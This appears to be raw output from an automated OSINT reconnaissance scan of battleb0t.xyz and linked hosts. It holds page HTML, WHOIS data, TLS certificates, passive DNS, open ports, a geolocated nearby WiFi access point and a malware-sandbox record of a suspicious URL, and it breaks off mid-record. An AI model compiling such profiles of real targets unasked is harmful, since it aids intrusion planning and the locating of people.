color: lightblue;
background-color: rgba(0,0,0,0.4);
animation: promo-appear-animation 0.35s ease-out;
}
.promo-middle {
display: table-cell;
vertical-align: middle;
}
.promo-content {
width: 80vw;
height: 80vh;
max-width: 80vh;
max-height: 80vw;
margin: auto;
padding: 0;
font-size: 2.8vmax;
font-family: Futura, "Trebuchet MS", Arial, sans-serif;
text-align: center;
background-image: url("promo_back.png");
background-position: center;
background-repeat: no-repeat;
background-size: cover;
border-radius: 15px;
box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2), 0 6px 20px 0 rgba(0,0,0,0.19);
}
.promo-header {
height: 10%;
padding: 2px 16px;
}
.promo-close {
width: 10%;
height: 100%;
text-align: left;
float: left;
font-size: 1.3em;
/* transition: 0.2s; */
}
.promo-close:hover {
/* transform: scale(1.25); */
cursor: pointer;
}
.promo-body {
padding: 8px 16px 16px 16px;
margin: auto;
}
.promo-body p {
margin-top: 0;
mix-blend-mode: color-dodge;
}
.link {
width: 100%;
display: inline-block;
}
.link img {
width: 100%;
}
@keyframes promo-appear-animation {
0% {
transform: scale(2.0);
opacity: 0;
}
100% {
transform: scale(1.0);
opacity: 1;
}
}
</style>
<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-105392568-1', 'auto');
ga('send', 'pageview');
</script>
<script async src="https://www.google-analytics.com/analytics.js"></script>
</head>
<body>
<canvas></canvas>
<!-- Mother of God, pls forgive me -->
<div class="promo">
<div class="promo-middle">
<div class="promo-content">
<div class="promo-header">
<span class="promo-close">×</span>
</div>
<div class="promo-body">
<p>Try Fluid Simulation app!</p>
<div class="links-container">
<a class="link" id="apple_link" target="_blank">
<img class="link-img" alt="Download on the App Store" src="app_badge.png"/>
</a>
<a class="link" id="google_link" target="_blank">
<img class="link-img" alt="Get it on Google Play" src="gp_badge.png"/>
</a>
</div>
</div>
</div>
</div>
</div>
<script src="./script.js"></script>
</body>
</html> |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | Domains By Proxy, LLC | Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-09-16T17:34:41Z
Creation Date: 2014-07-15T10:59:40Z
Registry Expiry Date: 2023-07-15T10:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-07-16T08:59:21Z
Creation Date: 2014-07-15T05:59:40Z
Registrar Registration Expiration Date: 2023-07-15T05:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-github-request-id: 70D2:0CB6:1A723F4:28AE86F:645DAA55 | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 02:53:17 | IP Address | No | Mnemonic PassiveDNS | 74 | 0 | 1 | 0 | None | 188.114.96.1 | ayhu.xyz |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:8d:d7:e0:05:18:38:a5:db:8a:48:64:f2:68:9a:98:22:c8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 26 02:43:31 2023 GMT
Not After : Jul 25 02:43:30 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Apr 26 03:43:31.388 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:43:38:D1:BA:46:EB:FB:AE:E5:0E:F5:96:
0C:2E:94:E5:49:45:23:64:6A:0D:BD:FC:87:A8:B8:00:
87:FD:24:62:02:20:75:87:54:4A:DF:64:4F:88:2E:B1:
25:57:3C:E7:3A:E0:19:3B:72:E0:C9:1A:87:B9:BB:3F:
35:51:E8:55:8F:82
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 26 03:43:31.409 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:5D:9E:62:37:CB:DB:77:1F:86:0C:C3:56:
8B:76:28:CE:A6:09:34:6A:3E:14:48:88:F6:21:96:4B:
D9:19:A8:EE:02:21:00:BC:CD:90:3B:08:38:44:A5:BB:
D6:38:35:73:D2:AD:F4:37:33:C9:DB:0D:66:F0:E9:9B:
ED:6A:44:1F:1B:F5:8E
Signature Algorithm: sha256WithRSAEncryption
7c:fa:bc:17:47:a7:e5:00:0d:95:46:f6:aa:b8:5c:00:e2:ec:
d7:d1:7a:8b:68:b6:74:b4:92:6d:3d:5e:34:79:68:36:4b:b1:
22:bc:39:10:53:ed:b5:6d:cb:32:be:a6:64:84:36:56:88:b4:
46:53:a9:13:77:42:0f:15:bd:f9:cb:e5:28:5d:fb:7e:a2:45:
2c:88:d0:5e:f0:2b:7e:c6:76:b9:0b:22:71:21:a1:7c:97:5c:
3a:e6:c7:51:0e:74:ba:87:b5:20:a9:b3:67:69:9c:c8:fc:3e:
a3:b5:ad:ee:73:7a:3e:e4:18:0a:93:40:47:fa:a9:04:04:e1:
f7:88:c4:73:97:3f:0c:9b:41:a3:36:f3:ec:33:03:ab:0c:30:
00:c0:20:bd:7a:4b:9a:0b:2b:5b:6d:f2:ba:7f:cc:e9:7b:ea:
fb:92:46:62:0b:ad:ee:b0:ba:89:ac:82:3a:17:07:50:53:81:
b3:41:01:ce:5c:08:dd:10:1b:6c:39:d6:14:34:c6:10:a8:c1:
d6:c2:f7:02:f7:45:91:38:08:18:a2:cd:a4:11:ec:4f:45:cb:
9e:27:ab:1e:0d:3e:e8:66:62:38:57:e6:40:15:8a:71:ee:e2:
dc:77:56:dc:8b:57:bb:4b:a9:03:f5:23:c6:cf:0a:e7:07:60:
58:ae:4b:bd
| battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | roLAN (Net ID: 00:0F:B5:E5:CF:1E) | 50.8897, 6.0563 |
| 2023-05-12 03:10:04 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | beatrixhaller.at | beatrixhaller.at |
| 2023-05-12 02:56:32 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
26:cc:7f:01:c6:92:25:78:13:50:9e:48:80:75:15:57
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Mar 23 22:37:05 2023 GMT
Not After : Jun 21 22:37:04 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:aa:7b:81:42:e7:bb:ef:b8:0c:29:95:16:51:5f:
17:ef:12:01:ea:12:d1:38:f6:d6:ab:de:90:73:55:
a4:af:cb:7c:f7:08:2e:7f:ec:c7:d3:07:5d:b2:f5:
bb:41:e9:04:92:a8:3c:a4:cb:ef:73:55:b5:a9:bc:
5c:d1:be:26:4b:99:f3:8a:57:d8:c7:77:79:1d:0e:
70:31:81:bc:da:4a:73:41:e5:08:81:59:46:c7:d8:
68:74:56:c2:f6:64:23:af:1b:88:8f:72:bd:52:09:
2e:97:9b:f1:a4:cf:09:d8:89:91:91:ca:2e:06:41:
a2:84:ad:0d:6a:df:00:95:f5:ec:e2:1e:49:48:18:
0a:3f:98:fa:06:a5:50:9f:7c:2c:20:19:c1:55:cd:
77:d2:89:47:dd:a9:ee:13:f6:2f:e2:48:87:26:a5:
fd:85:17:06:37:b0:a9:d0:53:b4:4d:e3:4c:ec:0e:
83:60:b2:ad:ad:2d:44:08:30:33:b0:91:f7:b0:f8:
00:7f:d1:49:37:39:19:99:a3:59:5c:dc:4a:a0:c5:
bd:ef:ae:e1:d6:c3:40:3c:f6:35:0e:db:7b:df:4f:
54:c4:bd:f6:3a:2c:2b:ff:c9:5b:e5:d2:e9:69:24:
02:0b:f7:c6:94:a2:a1:ed:73:64:15:f9:25:08:00:
3b:85
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E7:35:7E:35:FD:7B:BC:32:B5:C0:52:8C:76:D9:7D:F0:37:0A:7A:3D
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/X4UdJFi-bqE
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/QCTFvWRh6mE.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
09:9f:cd:b5:43:3b:6a:2f:1d:c9:3b:c0:c8:50:40:4b:85:6c:
a4:67:c0:ea:9c:ed:fa:82:03:5a:15:d9:da:e2:17:9e:f5:4d:
17:b3:27:61:b6:b3:76:a2:5c:3c:dc:1f:ca:d1:cf:2a:8c:c5:
9f:e1:42:b1:ce:4f:6c:8b:d7:5b:5d:4a:1a:37:bf:f7:48:1c:
b0:1e:50:fd:1f:d7:83:b8:62:23:8e:ce:bc:13:38:47:cd:3d:
85:a8:0c:e6:2b:35:45:86:97:06:88:96:8f:aa:84:6c:ae:91:
25:1d:3c:c7:d6:f8:a1:4f:51:5e:ed:a9:fe:6b:22:98:84:a4:
ef:b4:d3:2f:02:db:9e:b8:fb:29:cc:58:62:ad:6f:ac:48:dc:
16:46:0c:14:b4:34:7b:60:f1:ec:27:16:2b:4e:4a:c3:37:36:
d0:34:81:c1:2b:54:8c:d5:17:57:ba:55:4c:71:58:26:4f:c6:
22:b8:65:ba:ad:e7:f5:f2:a8:04:c1:7d:df:11:ab:7d:f5:94:
7d:56:64:8a:41:7f:f4:d3:d7:1a:a0:c6:cc:e6:42:c8:ac:de:
6a:33:c1:21:70:bc:bd:6f:69:08:1f:8f:fa:9f:b7:aa:ca:2e:
e6:b7:8f:15:ac:fb:89:0e:c0:5f:c0:b9:df:e8:c0:15:b9:87:
ca:00:58:c5
| battleb0t.xyz |
| 2023-05-12 02:44:35 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Cloudflare | fluid.battleb0t.xyz |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2083 | 188.114.97.1 |
| 2023-05-12 02:44:09 | Raw Data from RIRs | No | CertSpotter | 1 | 0 | 1 | 0 | None | [{u'pubkey_sha256': u'b8939526809ab88640a6a7884ee8dcb607fb00f7e0fcea60466af2f352ad1591', u'cert_sha256': u'4c1b41a7240eddfb2785d811a40b2c4f57217bbf48c89ee37ab9bce9cbb2e8a1', u'revoked': False, u'not_after': u'2023-05-12T05:22:09Z', u'not_before': u'2023-02-11T05:22:10Z', u'cert': {u'data': u'MIIEbzCCA1egAwIBAgIQDOP0HOjLu88T92xvNl7C6zANBgkqhkiG9w0BAQsFADBGMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzETMBEGA1UEAxMKR1RTIENBIDFQNTAeFw0yMzAyMTEwNTIyMTBaFw0yMzA1MTIwNTIyMDlaMBUxEzARBgNVBAMMCiouYXlodS54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDOGCjuHkugVPWyqEZy+nobtYPZt7mFtn64J+1Cu/WN2QyWoaw56LqsavmfDUZ9HWXUVkqJx6zzQg59eXqwARoe31pklpJBe3azcWUF1NOsy93t9hAuPZS8/rhdm68fc2ZBVSSRj2qTCcSpTsw/24NTkr7leWPXwPKt+xVM2s8mD64JEzJeL2F530O3Lj56P/FxUWrQLFEUK+VaOipjp4Bp1t3/Ick6bFmxlNeg1uDFWWINRTP8zAjzuQip6iSYXyI8W1F67yrbjMq2vTkc7Ol2GVTf9zgRMiB/Akq7l6c0/aiLNuo2r2JTnXhKt5g6qQePdJ5DMQirvmLAXgHszlPdAgMBAAGjggGIMIIBhDAOBgNVHQ8BAf8EBAMCBaAwEwYDVR0lBAwwCgYIKwYBBQUHAwEwDAYDVR0TAQH/BAIwADAdBgNVHQ4EFgQU96deJC4cenoqkDbfZhhrpxc2fj4wHwYDVR0jBBgwFoAU1fyeDd8eyt0Il5duK8VfxSv17LgweAYIKwYBBQUHAQEEbDBqMDUGCCsGAQUFBzABhilodHRwOi8vb2NzcC5wa2kuZ29vZy9zL2d0czFwNS9fTmFMS1NHU0lFWTAxBggrBgEFBQcwAoYlaHR0cDovL3BraS5nb29nL3JlcG8vY2VydHMvZ3RzMXA1LmRlcjAfBgNVHREEGDAWggoqLmF5aHUueHl6gghheWh1Lnh5ejAhBgNVHSAEGjAYMAgGBmeBDAECATAMBgorBgEEAdZ5AgUDMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmxzLnBraS5nb29nL2d0czFwNS9mWGJyRDA5NGl5US5jcmwwEwYKKwYBBAHWeQIEAwEB/wQCBQAwDQYJKoZIhvcNAQELBQADggEBAAm86rbPU9UY+jUB9RqEtNsbNagh1LAcjGHZCu2KmA7sWdF+ildPgYUhnYEXpW1QtwIXMD9ROQ8NqNmcO2+fFmv29nEwHvbN33YowTi0KujSztgietwrMtbLR4i1CYT6Emxu4DUWuySMl7qRfkVQnpXce/+W4fk3ETBciS7tpUJ/JrdchA9f4Nr5MvrivapSUXDN8HngLY5nVjy6wh7ZL6ZLE4zPcIWLBYbq7XqKdcSHxPy4EXKMN7HwCCE1+moKpyhYBi5LdBFwHiBf0mAs9kLK+ixuUCcq6r2PLcJm5OMMaUoLRxiiKSvKNU5S6XjdCKjia1FdeNTyixlmVdGqIfU=', u'sha256': u'4c1b41a7240eddfb2785d811a40b2c4f57217bbf48c89ee37ab9bce9cbb2e8a1', u'type': u'precert'}, u'dns_names': [u'*.ayhu.xyz', u'ayhu.xyz'], u'tbs_sha256': u'98d7b9ddd34587a9f0ca631c67a7ef0e434801d5af54bf0a58a4414132b54b78', u'id': u'4808403185', u'issuer': {u'pubkey_sha256': u'f3559fd766dc2e51474007c996ec67cd9e85ae0fa827d3d663f5abc2eafcbe24', u'friendly_name': u'Google Trust Services', u'name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5'}}, {u'pubkey_sha256': u'dc08bc7c8382f13f52efa247fc61a39cf343f06bf7ea548d231815f230797186', u'cert_sha256': u'c7525168b3dd0eaab22aaa03f908df3de610c6fa812b471a74d4a9b4cc1f27a5', u'revoked': False, u'not_after': u'2023-07-10T04:54:49Z', u'not_before': u'2023-04-11T04:54:50Z', u'cert': {u'data': u'MIIEbzCCA1egAwIBAgIQDUCN2XyhvUwNBsU/w+kuvDANBgkqhkiG9w0BAQsFADBGMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzETMBEGA1UEAxMKR1RTIENBIDFQNTAeFw0yMzA0MTEwNDU0NTBaFw0yMzA3MTAwNDU0NDlaMBUxEzARBgNVBAMMCiouYXlodS54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQClZfrYebeqn81huW1hu+MHJxbT4UZY2+o1+CbYyAl+tjl5EkV/SpbCZUe8N7N2RoMIJHsyY/UHthdmIBjkGIxuFn+8gewQOMwgbSzWKWU9JBV6eCrQQzxGAxCzJ0fGLNk3GvgRqoKtAHaniAwr8RqympV2xKlLw2L5Eoc1mlBgcYkGC/WDP7M3iz3L+cKZ7pnTyAgH4cYg/B7LlXT1wXQzixs5LmOJmGK9msYTsrWV7Mvuzifn2iTxjrbmq+J6IGPhJqvoBQMwbq5Z1AImEDbuPSr0wHhZ+nfNKoi9FpQa4cTK2Fu3Ei7bEA7slHdASbNvdRgi08tYPETQBeLbqADJAgMBAAGjggGIMIIBhDAOBgNVHQ8BAf8EBAMCBaAwEwYDVR0lBAwwCgYIKwYBBQUHAwEwDAYDVR0TAQH/BAIwADAdBgNVHQ4EFgQUulEpDi4duOMaunwRjTxpuyewUacwHwYDVR0jBBgwFoAU1fyeDd8eyt0Il5duK8VfxSv17LgweAYIKwYBBQUHAQEEbDBqMDUGCCsGAQUFBzABhilodHRwOi8vb2NzcC5wa2kuZ29vZy9zL2d0czFwNS9UUVhRYlQ1bk1TNDAxBggrBgEFBQcwAoYlaHR0cDovL3BraS5nb29nL3JlcG8vY2VydHMvZ3RzMXA1LmRlcjAfBgNVHREEGDAWggoqLmF5aHUueHl6gghheWh1Lnh5ejAhBgNVHSAEGjAYMAgGBmeBDAECATAMBgorBgEEAdZ5AgUDMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmxzLnBraS5nb29nL2d0czFwNS9QWDdmUjU5eVYtcy5jcmwwEwYKKwYBBAHWeQIEAwEB/wQCBQAwDQYJKoZIhvcNAQELBQADggEBADWK0mf97bEjcvCiTJfuxX7hsITeF+N/sP1M5PXZwYdKuDLWlxMtq8PYDM5gAno91YtPm4k3HgfoZU8T27zyP7rqOreX2KDASmWMNTX9aXcIbDy/4qZKAsr87eVSibzBtmGYeTyjMYzWHUlMbk9RS4Avowrr/aAdIwGetxORLuo5pmqlbmWgYEfP+kQB5K/ydMbAnChF1+tYOcc5JEHy8+OjqotZXAWhkQ6i8LCryznoWZcbn43YwkerwtlGA3pd6/0+ZQ35/twbopWANPBk9tZaQ+QrX1OLhGVTly+Pu/Qd+BCCGNrSMzGU6lmw3kkxpyhlDF7n+89Y8N5wm1xnU9E=', u'sha256': u'c7525168b3dd0eaab22aaa03f908df3de610c6fa812b471a74d4a9b4cc1f27a5', u'type': u'precert'}, u'dns_names': [u'*.ayhu.xyz', u'ayhu.xyz'], u'tbs_sha256': u'e25b9a56735c29036e5e585244fde0a2ba81adaf796b2d716bde988fd3954995', u'id': u'5073393240', u'issuer': {u'pubkey_sha256': u'f3559fd766dc2e51474007c996ec67cd9e85ae0fa827d3d663f5abc2eafcbe24', u'friendly_name': u'Google Trust Services', u'name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5'}}] | ayhu.xyz |
| 2023-05-12 03:09:46 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 64.170.74.34.bc.googleusercontent.com | 34.74.170.64 |
| 2023-05-12 02:46:24 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | North Charleston, United States | 104.196.30.220 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000justin000.github.io | 185.199.111.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | LINE (Category: social)
https://line.me/R/ti/p/@login?from=page | login |
| 2023-05-12 02:59:09 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': None, u'compromised_hosts': [u'34.74.170.74'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://regclickonetwoget.com/?viwe=B5ZRVJ5AIOMUMPXF7NBL-8845fcbc2b0cfc99c4cf3eaf075db59ceb055d0a37e8', u'signatures': [{u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3156 -s 132" (UID: 00000000-00003396)'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "DBWinMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_ce4_IE_EarlyTabStart_0xf98_Mutex"\n "IsoScope_ce4_IESQMMUTEX_0_519"\n "IsoScope_ce4_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3300"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ce4_ConnHashTable<3300>_HashTable_Mutex"\n "IsoScope_ce4_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n 